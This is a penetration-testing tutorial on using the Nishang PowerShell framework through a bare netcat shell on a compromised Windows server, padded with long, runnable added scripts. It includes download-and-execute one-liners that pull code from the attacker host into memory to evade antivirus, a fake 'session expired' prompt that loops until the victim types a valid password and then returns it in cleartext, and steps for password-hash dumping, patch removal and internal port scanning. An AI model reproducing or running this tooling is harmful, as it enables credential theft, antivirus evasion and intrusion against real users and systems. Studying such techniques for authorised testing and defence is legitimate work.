Nishang: A Post-Exploitation Framework

Introduction

I was recently doing an external penetration test for one of our clients, where I got shell access to a Windows Server 2012 (an internal web server sitting behind an IPS) with Administrative privileges. It also appeared to have an antivirus installed on the system, as everything I was uploading to the machine was being deleted on the fly. I was looking at all the possibilities to get around this problem, and decided to go with PowerShell. The moment you decide to go with PowerShell for your post exploitation, you don't really need to worry about writing your own scripts to win the game, as there are a couple of options available online. One among them that I really liked is Nishang. Although I have been observing this framework right from its inception, I never got a chance to use it in real-world penetration tests before this.
If you ever come across a situation where you need to use Nishang in your pentests, as long as you have RDP access to the remote machine, your life is easy. However, how do you proceed when RDP is not available and all you have is a remote shell? This article serves as an introduction to using Nishang when you only have a remote shell.

What is Nishang?

Nishang is an open source framework with several powerful PowerShell scripts that you can use during the post exploitation phase of your penetration test. It has many scripts organised into categories such as information gathering, scanning, privilege escalation, etc. This article will cover some of those scripts in no specific order. The rest of the scripts are left to the reader as an exercise, since Nishang is well documented and every script carries comment-based help (Get-Help works on them once imported).
The main goal of this article is to introduce Nishang and to demonstrate how to use it when all you have is a remote shell on the target system.

Lab Setup:

Before you start reading the article, there are a few points to note.
  1. There are a few payloads in Metasploit that give you an interactive PowerShell console on the victim's machine. When you use them, you get a remote PowerShell where you can run your PowerShell cmdlets and scripts directly.
  2. Meterpreter does not appear to work well with PowerShell. This means you may not get an interactive PowerShell console when you have a Meterpreter shell and try to start PowerShell from it by running "powershell.exe" in the command shell.
  3. It is always good to learn things with a shell that has limited features, so that you get the most out of what you are learning. Therefore we use a plain interactive shell obtained from the remote machine with Netcat.

Installation

The following figure shows a shell with Administrative privileges.
[Figure: Netcat shell on the target with Administrative privileges]
We will use this shell to run Nishang and explore some of its scripts.
Nishang is available in Kali Linux under the "/usr/share/nishang/" directory. Alternatively, you can download it from the following link.
https://github.com/samratashok/nishang

Let’s begin.
When we have a remote shell, there are a few options for executing PowerShell scripts. First, however, you need to decide between the following two situations.
  1. You want to download your scripts onto the disk and then execute them.
  2. You want to execute your scripts without touching the disk.
I am going with the first option in this article. If you are interested in option 2, the method is given at the end of the article.

Uploading files onto the remote machine

The following 3-line script can be used to download your scripts onto the victim's machine. Note that the quotes must be plain ASCII double quotes; curly quotes pasted from a web page are not string delimiters in PowerShell and the script will fail to parse.
$client = New-Object System.Net.WebClient
$targetlocation = "http://192.168.56.103/Check-VM.ps1"
$client.DownloadFile($targetlocation, "Check-VM.ps1")

We are downloading the Check-VM.ps1 script onto the remote machine using the above script. Therefore, we need to create a file with the above script as its content. To do this, just type the following commands one by one into the shell we got. cmd.exe's echo writes the quotes literally, which is exactly what we want here; the only thing to watch is that the redirect operators are not quoted.
echo $client = New-Object System.Net.WebClient > script.ps1
echo $targetlocation = "http://192.168.56.103/Check-VM.ps1" >> script.ps1
echo $client.DownloadFile($targetlocation, "Check-VM.ps1") >> script.ps1

This looks as shown below.
[Figure: script.ps1 created on the target with echo]
Once you have your script ready on the target system, run it as shown below so that Check-VM.ps1 is downloaded onto the remote machine. The script is downloaded into the current working directory of the shell, so note where you are before running it.
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1

[Figure: Check-VM.ps1 downloaded onto the target]
As we can see in the above figure, the Check-VM.ps1 script has been downloaded and is ready for action. Similarly, you can download any script that you want.
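The echo-built downloader above is fragile (one stray quote breaks it, and nothing checks that what arrived over plain HTTP is the script you meant to fetch; in the author's scenario an AV was deleting uploads on the fly, and a truncated or removed file would go unnoticed). The following is an added example, not part of the original article and not Nishang code: a downloader that stages several scripts in one directory and compares each file's SHA-256 against a value you computed beforehand on the attacking machine (for instance with sha256sum). The web server address is the article's; the staging directory and the hash values are placeholders you replace with your own.

```powershell
# Added example, not Nishang code. Downloads one or more scripts from the attacker's
# web server to a staging directory and verifies each file's SHA-256 after it has
# been written to disk. Assumptions: 192.168.56.103 serves the scripts over HTTP as
# in the article, the expected hashes were computed on the attacking machine, and
# the target runs PowerShell 3.0 or later (the Windows Server 2012 default).
function Get-StagedScript {
    param(
        [Parameter(Mandatory = $true)][string]$BaseUrl,      # e.g. http://192.168.56.103
        [Parameter(Mandatory = $true)][hashtable]$Expected,  # script name -> SHA-256 hex
        [string]$Directory = (Join-Path $env:TEMP 'ps')      # placeholder staging directory
    )
    if (-not (Test-Path $Directory)) { New-Item -ItemType Directory -Path $Directory | Out-Null }
    $client = New-Object System.Net.WebClient
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $results = @()
    foreach ($name in $Expected.Keys) {
        $dest = Join-Path $Directory $name
        $actual = $null
        $ok = $false
        try {
            $client.DownloadFile("$BaseUrl/$name", $dest)
            # Hash the bytes that are actually on disk, not the HTTP response, so a
            # file that an inline device or AV rewrote, truncated or removed is caught.
            $bytes = [System.IO.File]::ReadAllBytes($dest)
            $actual = ([System.BitConverter]::ToString($sha.ComputeHash($bytes))).Replace('-', '').ToLower()
            $ok = ($actual -eq $Expected[$name].ToLower())
        } catch {
            Write-Warning "$name`: $($_.Exception.Message)"
        }
        # Never leave a file behind that does not match what you intended to run.
        if (-not $ok) { Remove-Item $dest -Force -ErrorAction SilentlyContinue }
        $results += New-Object PSObject -Property @{ Script = $name; Path = $dest; Verified = $ok; Sha256 = $actual }
    }
    $results
}

# Usage. The hash strings are placeholders; put the values from your own copy of Nishang here.
Get-StagedScript -BaseUrl 'http://192.168.56.103' -Expected @{
    'Check-VM.ps1'  = '<sha256 of your Check-VM.ps1>'
    'Port-Scan.ps1' = '<sha256 of your Port-Scan.ps1>'
} | Format-Table Script, Verified, Path -AutoSize
```

Save this as its own .ps1 and fetch it once with the 3-line downloader; after that every further script goes through the verified path. A Verified value of False with no warning means the file downloaded fine but its content differs from your copy, which is worth investigating before you import it.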

Check-VM

The first script we will try is Check-VM.ps1, which we just downloaded. This script checks whether the target machine is running inside a VM by looking for various signatures. For example, if a process called vboxtray.exe is running, it is probably VirtualBox. Similarly, if the following registry entry is found, the script reports VirtualBox.
[Figure: VirtualBox registry entry checked by Check-VM]
Doing this manually would be tedious. This script automates the whole process.
To run this script, we need to import the module first and then call the function "Check-VM". Since we are on a remote shell that is not an interactive PowerShell session, use the following one-liner to do both in one shot (-exec is the accepted abbreviation of -ExecutionPolicy; adjust the path to wherever you downloaded the script).
Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Check-VM.ps1'; Check-VM}"

[Figure: Check-VM output identifying VirtualBox]
As shown in the above figure, the script has identified the machine as a VirtualBox guest.
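To make concrete what "checking for various signatures" means, here is an added example, written for this page and not a copy of Nishang's Check-VM: it runs the three kinds of manual check the text describes (guest-tools processes, hypervisor registry keys, hardware identity strings from WMI) and returns every indicator it finds as an object. The signature lists are ones I chose as commonly seen for VirtualBox, VMware and Hyper-V guests; they are assumptions about typical guests, not Check-VM's own list.

```powershell
# Added example, not Nishang's Check-VM. Collects hypervisor indicators from running
# processes, the registry and WMI. Signature lists are my own choice of common
# VirtualBox / VMware / Hyper-V markers, not a copy of Check-VM's.
function Get-VmEvidence {
    $found = New-Object System.Collections.ArrayList
    function Add-Hit ([string]$Source, [string]$Indicator, [string]$Product) {
        [void]$found.Add((New-Object PSObject -Property @{ Source = $Source; Indicator = $Indicator; Product = $Product }))
    }

    # 1. Guest-additions / guest-tools processes (names as Get-Process reports them, no .exe).
    #    PowerShell hashtable keys are case-insensitive, so no normalisation is needed.
    $procSigs = @{ vboxtray = 'VirtualBox'; vboxservice = 'VirtualBox'; vmtoolsd = 'VMware'; vmwaretray = 'VMware' }
    foreach ($name in (Get-Process | Select-Object -ExpandProperty Name -Unique)) {
        if ($procSigs.ContainsKey($name)) { Add-Hit 'Process' "$name.exe" $procSigs[$name] }
    }

    # 2. Registry keys created by the hypervisor's firmware tables or by the guest tools.
    $regSigs = @{
        'HKLM:\SOFTWARE\Oracle\VirtualBox Guest Additions'         = 'VirtualBox'
        'HKLM:\HARDWARE\ACPI\DSDT\VBOX__'                           = 'VirtualBox'
        'HKLM:\SOFTWARE\VMware, Inc.\VMware Tools'                  = 'VMware'
        'HKLM:\SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters' = 'Hyper-V'
    }
    foreach ($key in $regSigs.Keys) {
        if (Test-Path $key) { Add-Hit 'Registry' $key $regSigs[$key] }
    }

    # 3. Hardware identity strings exposed through WMI. "Virtual Machine" is the model
    #    string Hyper-V reports; a physical Microsoft device does not use it.
    $cs   = Get-WmiObject Win32_ComputerSystem
    $bios = Get-WmiObject Win32_BIOS
    $fields = @{
        'Win32_ComputerSystem.Manufacturer' = $cs.Manufacturer
        'Win32_ComputerSystem.Model'        = $cs.Model
        'Win32_BIOS.Manufacturer'           = $bios.Manufacturer
        'Win32_BIOS.SerialNumber'           = $bios.SerialNumber
    }
    $wmiSigs = @{ 'innotek|VirtualBox|VBOX' = 'VirtualBox'; 'VMware' = 'VMware'; 'Virtual Machine' = 'Hyper-V' }
    foreach ($field in $fields.GetEnumerator()) {
        foreach ($pattern in $wmiSigs.Keys) {
            if ("$($field.Value)" -match $pattern) {
                Add-Hit 'WMI' "$($field.Key)=$($field.Value)" $wmiSigs[$pattern]
            }
        }
    }
    $found.ToArray()
}

# Usage: list every indicator, or say so if none was found.
$hits = Get-VmEvidence
if ($hits) { $hits | Format-Table Product, Source, Indicator -AutoSize } else { 'No hypervisor indicators found' }
```

Returning the evidence rather than a yes/no answer is deliberate: a single process name can be spoofed or absent (guest additions are not always installed), whereas agreement between a registry key and the BIOS strings is much harder to explain away.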

Port-Scan

The next script is Port-Scan. This is one of the most useful scripts in Nishang. Once you gain access to an internal machine, finding the internal IPs and scanning them for open ports is always a crucial part of post exploitation. This script makes it very easy to discover the live IPs in a specified range and scan them for open ports.
Run the following command to find the live IPs between 192.168.56.101 and 192.168.56.105, resolve their host names, and then scan them for open ports.
Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan -StartAddress 192.168.56.101 -EndAddress 192.168.56.105 -ResolveHost -ScanPort}"

[Figure: Port-Scan output showing live hosts and open ports]
Here is the awesomeness: we found a domain controller in the lab network.
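The following is an added example for this page, not Nishang's Port-Scan: a small sweep of an IPv4 range with a TCP connect check per port, returning objects you can filter instead of text. It shows the two pieces such a scanner needs, iterating an address range and a connect attempt with a real timeout (a bare TcpClient.Connect() blocks for around 20 seconds on a filtered port, which is what makes naive scanners so slow). The port list and the "likely domain controller" heuristic are my own choices; the address range is the article's lab range.

```powershell
# Added example, not Nishang's Port-Scan. Ping sweep plus TCP connect scan over an
# IPv4 range, with a per-port timeout. Port list and DC heuristic are assumptions.
function ConvertTo-IPv4Number ([string]$Address) {
    $b = [System.Net.IPAddress]::Parse($Address).GetAddressBytes()
    [Array]::Reverse($b)                       # network byte order -> little-endian host order
    [System.BitConverter]::ToUInt32($b, 0)
}
function ConvertFrom-IPv4Number ([uint32]$Number) {
    $b = [System.BitConverter]::GetBytes($Number)
    [Array]::Reverse($b)
    (New-Object System.Net.IPAddress -ArgumentList (,$b)).ToString()
}
function Test-TcpPort ([string]$Address, [int]$Port, [int]$TimeoutMs) {
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $ar = $client.BeginConnect($Address, $Port, $null, $null)
        if (-not $ar.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) { return $false }  # no SYN/ACK in time
        $client.EndConnect($ar)                # throws on RST, i.e. a closed port
        $true
    } catch { $false } finally { $client.Close() }
}
function Invoke-SimplePortScan {
    param(
        [Parameter(Mandatory = $true)][string]$StartAddress,
        [Parameter(Mandatory = $true)][string]$EndAddress,
        [int[]]$Ports = @(22, 53, 80, 88, 135, 139, 389, 443, 445, 636, 3389, 5985),
        [int]$TimeoutMs = 300,
        [switch]$SkipPing,        # also scan hosts that do not answer ICMP (common on hardened servers)
        [switch]$ResolveHost
    )
    $first = ConvertTo-IPv4Number $StartAddress
    $last  = ConvertTo-IPv4Number $EndAddress
    for ($n = $first; $n -le $last; $n++) {
        $ip = ConvertFrom-IPv4Number $n
        if (-not $SkipPing -and -not (Test-Connection -ComputerName $ip -Count 1 -Quiet)) { continue }
        $open = @($Ports | Where-Object { Test-TcpPort $ip $_ $TimeoutMs })
        if ($SkipPing -and $open.Count -eq 0) { continue }   # nothing answered at all: treat as down
        $name = if ($ResolveHost) { try { [System.Net.Dns]::GetHostEntry($ip).HostName } catch { $null } } else { $null }
        New-Object PSObject -Property @{
            Address   = $ip
            HostName  = $name
            OpenPorts = ($open -join ',')
            # Kerberos, LDAP and SMB together on one host is the usual signature of a domain controller.
            LikelyDC  = (($open -contains 88) -and ($open -contains 389) -and ($open -contains 445))
        }
    }
}

# Usage: the article's lab range.
Invoke-SimplePortScan -StartAddress '192.168.56.101' -EndAddress '192.168.56.105' -ResolveHost |
    Format-Table Address, HostName, OpenPorts, LikelyDC -AutoSize
```

Keep the timeout short on a LAN and raise it when scanning across a WAN link; a port that only shows up with a longer timeout is usually filtered, not open.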

Remove-Update

If you want to remove a patch installed on the target machine, this script is for you. The Remove-Update script removes a given update from the target. Be aware that this is a destructive change to a client system: it reopens whatever the patch fixed and leaves entries in the Windows event logs, so only do it when the engagement explicitly allows it.
First, let's check the list of hotfixes installed using the cmdlet "Get-HotFix".
[Figure: Get-HotFix output listing installed updates]
Now, let's try to remove the second update, KB2534366. Run the Remove-Update script as shown below.
Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"

[Figure: Remove-Update output]
As we can see in the above figure, the update has been removed. We can cross-check it by running the same cmdlet once again, as shown below.
[Figure: Get-HotFix output after removal; KB2534366 is no longer listed]
Success! The update has been removed.
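The before-and-after check done by eye above is worth automating, because wusa.exe returns silently and some removals only complete after a reboot. The following is an added example, not Nishang's Remove-Update: it removes a hotfix with the built-in Windows Update Standalone Installer (wusa.exe /uninstall), which is the supported way to uninstall an MSU package, and returns an object recording whether the update was present before, whether Get-HotFix still lists it afterwards, and whether a reboot is pending. KB2534366 is the update used in the article.

```powershell
# Added example, not Nishang code. Uninstalls a hotfix via wusa.exe and verifies
# the result with Get-HotFix before and after. Destructive: use only with explicit
# authorisation. Requires an elevated shell.
function Remove-HotFixChecked {
    param(
        [Parameter(Mandatory = $true)][string]$KB,   # e.g. 'KB2534366'
        [int]$TimeoutSeconds = 600
    )
    $id = $KB.ToUpper()
    if ($id -notmatch '^KB\d+$') { throw "Expected an identifier like KB2534366, got '$KB'" }

    $before = Get-HotFix | Where-Object { $_.HotFixID -eq $id }
    if (-not $before) {
        return New-Object PSObject -Property @{ KB = $id; WasInstalled = $false; Removed = $false; ExitCode = $null; RebootPending = $false }
    }

    # /quiet suppresses the UI, /norestart stops wusa from rebooting the target on its own.
    $p = Start-Process -FilePath "$env:SystemRoot\System32\wusa.exe" `
                       -ArgumentList "/uninstall /kb:$($id.Substring(2)) /quiet /norestart" -PassThru
    if (-not $p.WaitForExit($TimeoutSeconds * 1000)) { throw "wusa.exe did not finish within $TimeoutSeconds seconds" }

    $after = Get-HotFix | Where-Object { $_.HotFixID -eq $id }
    New-Object PSObject -Property @{
        KB            = $id
        WasInstalled  = $true
        Removed       = (-not $after)          # Get-HotFix no longer lists it
        ExitCode      = $p.ExitCode            # 0 = done, 3010 = done but reboot required
        RebootPending = ($p.ExitCode -eq 3010)
    }
}

# Usage: the article's update.
Remove-HotFixChecked -KB 'KB2534366' | Format-List KB, WasInstalled, Removed, ExitCode, RebootPending
```

If Removed is False but ExitCode is 3010, the package has been staged for removal and Get-HotFix will stop listing it only after the next reboot; rerun the check then rather than assuming the removal failed.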

Invoke-CredentialsPhish

This is a good script for phishing the victim's username and password in clear text. The best part is that you get the correct username and password, because the prompt keeps reappearing until the victim enters credentials that actually validate. One practical caveat: the dialog is shown in the session the PowerShell process runs in, so it only reaches the victim's screen when your shell is running inside that user's interactive desktop session; from a service context (session 0) nobody ever sees it.
Run the following command in the terminal.
Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"

This will open a window on the victim's machine as shown below. Let's first enter a random username and password.
[Figure: credential prompt shown on the victim's machine]
After a few seconds the window reappears, and the user has to enter the correct credentials to get rid of it. This time, let's enter the correct credentials.
[Figure: credential prompt reappearing after wrong credentials]
Now, let's see what happened at our terminal.
[Figure: captured username and password at the attacker's terminal]
We got the username and password entered by the victim.
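The mechanism behind "the window doesn't disappear until the credentials are correct" is a loop around a credential prompt and a real logon check. The following is an added example written for this page, not Nishang's Invoke-CredentialsPhish: it prompts with the standard Windows credential dialog, validates what was typed against the local machine or the domain the host is joined to, and only returns once validation succeeds or the attempt limit is hit. The caption and message text are my own; the attempt limit exists because every failed validation is a real failed logon against the account.

```powershell
# Added example, not Nishang's Invoke-CredentialsPhish. Re-prompts for credentials
# until they validate. Caption/message text and the attempt limit are my choices.
function Invoke-ValidatedCredentialPrompt {
    param(
        [string]$Caption = 'Windows Security',
        [string]$Message = 'Your session has expired. Please re-enter your credentials.',
        [int]$MaxAttempts = 5,
        [int]$RetryDelaySeconds = 5
    )
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
    # Validate against the domain when the host is domain-joined, else against the local SAM.
    $joined  = (Get-WmiObject Win32_ComputerSystem).PartOfDomain
    $ctxType = if ($joined) { 'Domain' } else { 'Machine' }
    $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext(
        [System.DirectoryServices.AccountManagement.ContextType]$ctxType)

    $default = "$env:USERDOMAIN\$env:USERNAME"
    for ($attempt = 1; $attempt -le $MaxAttempts; $attempt++) {
        # PromptForCredential shows the Windows credential dialog in this process's
        # session. It would fail under -NonInteractive, so do not pass that flag.
        $cred = $host.UI.PromptForCredential($Caption, $Message, $default, '')
        if ($cred -eq $null) { Start-Sleep -Seconds $RetryDelaySeconds; continue }   # user pressed Cancel

        $net = $cred.GetNetworkCredential()
        # ValidateCredentials performs a genuine logon attempt: each wrong password the
        # user types counts towards the account lockout threshold, hence MaxAttempts.
        if ($ctx.ValidateCredentials($net.UserName, $net.Password)) {
            return New-Object PSObject -Property @{
                Attempt  = $attempt
                Context  = $ctxType
                User     = $cred.UserName
                Password = $net.Password
            }
        }
        Start-Sleep -Seconds $RetryDelaySeconds
    }
    $null   # gave up without a valid credential
}

# Usage: run from a shell inside the victim's interactive session.
$captured = Invoke-ValidatedCredentialPrompt
if ($captured) { $captured | Format-List User, Password, Context, Attempt } else { 'No valid credentials entered' }
```

Returning the password only after a successful validation is what distinguishes this from a plain fake login box: a defender reviewing the security log will see the failed logons from the wrong attempts followed by a success from the same process, which is also the detection opportunity.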

FireBuster

FireBuster is a very useful script for checking which outbound ports are allowed through the firewall. It is meant to be paired with another script called FireListener, which acts as the listener on the attacker's side. Since this is just for testing, I started Netcat listeners on ports 5555 and 5556 on the attacker's machine instead of using FireListener. Now let us run the following command to see whether the victim can make outbound connections on these ports.
Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\FireBuster.ps1'; FireBuster 192.168.56.103 5555-5556}"

[Figure: FireBuster output, ports 5555 and 5556 reachable]
As we can see in the above figure, the victim machine is making outbound connections on the specified ports.
Let's run it another round, but this time I have blocked outbound connections to port 5556 in the Windows Firewall on the victim's machine.
[Figure: Windows Firewall outbound block rule for port 5556]
Let's run the script one more time and look at the results.
[Figure: FireBuster output with port 5556 blocked]
Nice, we can see that port 5556 is not listed in the output this time.
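A port that is "not listed" can mean two different things: the SYN left the host and was answered with a RST (nothing listening on the attacker's side), or it was silently dropped (the firewall). Telling those apart is what makes an egress test useful. The following is an added example for this page, not Nishang's FireBuster: it reproduces the article's experiment end to end on the target, creating the outbound block rule for 5556 with the NetSecurity cmdlets (Windows Server 2012 / Windows 8 and later, elevated shell), testing both ports against the attacker's host, and removing the rule afterwards. The attacker address and ports are the article's; the rule name is mine.

```powershell
# Added example, not Nishang's FireBuster. Classifies each outbound port as Open,
# Refused (reached the target, nothing listening) or Filtered (no answer: dropped
# by a firewall). Requires Administrator for the firewall cmdlets.
function Test-Egress {
    param(
        [Parameter(Mandatory = $true)][string]$Target,
        [Parameter(Mandatory = $true)][int[]]$Ports,
        [int]$TimeoutMs = 2000
    )
    foreach ($port in $Ports) {
        $client = New-Object System.Net.Sockets.TcpClient
        $state = 'Filtered'
        try {
            $ar = $client.BeginConnect($Target, $port, $null, $null)
            if ($ar.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) {
                try {
                    $client.EndConnect($ar)
                    $state = 'Open'
                } catch {
                    # PowerShell wraps .NET exceptions; unwrap to reach the SocketException.
                    $ex = $_.Exception
                    if ($ex.InnerException) { $ex = $ex.InnerException }
                    if ($ex -is [System.Net.Sockets.SocketException] -and
                        $ex.SocketErrorCode -eq [System.Net.Sockets.SocketError]::ConnectionRefused) {
                        $state = 'Refused'   # a RST came back, so the packet got out
                    }
                }
            }
        } finally { $client.Close() }
        New-Object PSObject -Property @{ Target = $Target; Port = $port; State = $state }
    }
}

# Lab reproduction of the article's second run: block 5556 outbound, test, clean up.
# On the attacker, have `nc -lvnp 5555` and `nc -lvnp 5556` listening first.
$ruleName = 'Lab egress test - block TCP 5556 out'
New-NetFirewallRule -DisplayName $ruleName -Direction Outbound -Action Block -Protocol TCP -RemotePort 5556 | Out-Null
try {
    Test-Egress -Target '192.168.56.103' -Ports 5555, 5556 | Format-Table Port, State -AutoSize
} finally {
    Remove-NetFirewallRule -DisplayName $ruleName
}
```

With both listeners up you should see 5555 as Open and 5556 as Filtered; stop the listener on 5555 and rerun without the rule and it becomes Refused, which confirms the classification is coming from the network and not from a bug in the test.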

Get-PassHashes

Dumping password hashes from the victim's machine is one of the most common things we do during post exploitation. Get-PassHashes dumps the password hashes from the victim's machine. This module requires an elevated shell, so if the shell you have is a non-elevated administrator shell, you first need to bypass UAC. It is worth checking which of the two you actually have before spending time on a bypass, since a shell obtained through a service or a scheduled task is often already elevated.
On an elevated shell, run the following command.
Powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"

[Figure: Get-PassHashes output]
As we can see in the above figure, we got all the hashes.
If you want to know more about UAC bypass concepts, please go through the following book written by me, where it is explained in detail.
http://resources.infosecinstitute.com/download/post-exploitation-without-automated-tools/
If you want to download and execute the modules covered above without touching the disk, you can use the following method. It downloads the script text and passes it straight to Invoke-Expression (IEX), so nothing is written for a file-scanning antivirus to delete. Keep in mind that on newer Windows versions PowerShell script block logging and AMSI still see the decoded script, and that the script travels over plain HTTP, so anyone in the path can replace it.
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.103/Check-VM.ps1'); Check-VM"
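The two points from this section, checking whether the shell is really elevated before running Get-PassHashes and loading a script in memory, fit naturally into one helper. The following is an added example written for this page, not Nishang code: it wraps the DownloadString + IEX pattern above in a function that refuses to run a module flagged as needing elevation unless the current token actually holds the Administrators role, then loads the script text and calls the named function. URLs and function names are the article's.

```powershell
# Added example, not Nishang code. In-memory loader with an elevation check.
# Nothing is written to disk; the downloaded text lives only in this process.
function Test-IsElevated {
    # True when the current token is a member of Administrators with the role
    # enabled, i.e. an elevated (UAC-approved) process; False for a filtered token.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    (New-Object System.Security.Principal.WindowsPrincipal($id)).IsInRole(
        [System.Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Invoke-InMemoryScript {
    param(
        [Parameter(Mandatory = $true)][string]$Url,        # e.g. http://192.168.56.103/Check-VM.ps1
        [Parameter(Mandatory = $true)][string]$Function,   # function that script defines
        [object[]]$Arguments = @(),
        [switch]$RequireElevation
    )
    if ($RequireElevation -and -not (Test-IsElevated)) {
        throw "$Function needs an elevated shell; the current token is not elevated (UAC bypass still required)."
    }
    $body = (New-Object System.Net.WebClient).DownloadString($Url)
    # Dot-sourcing the text inside this function defines the script's functions in
    # this function's scope for the duration of the call, then they disappear.
    . ([ScriptBlock]::Create($body))
    & $Function @Arguments
}

# Usage with the article's scripts. Check-VM needs no elevation; Get-PassHashes does.
Invoke-InMemoryScript -Url 'http://192.168.56.103/Check-VM.ps1' -Function 'Check-VM'
Invoke-InMemoryScript -Url 'http://192.168.56.103/Get-PassHashes.ps1' -Function 'Get-PassHashes' -RequireElevation
```

Failing early with a clear message is the point of the elevation check: Get-PassHashes run from a filtered token fails deeper inside, in a way that is harder to tell apart from a broken download or a defensive control kicking in.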

The Road Ahead

There are many other useful scripts available in Nishang that can be used during our penetration tests, and I am leaving them to the reader as an exercise, since the approach for running any other script remains the same. Another PowerShell toolkit, PowerSploit, has been discussed earlier on our blog and can be found here.
To know more about Nishang and its latest updates, please follow its blog here.
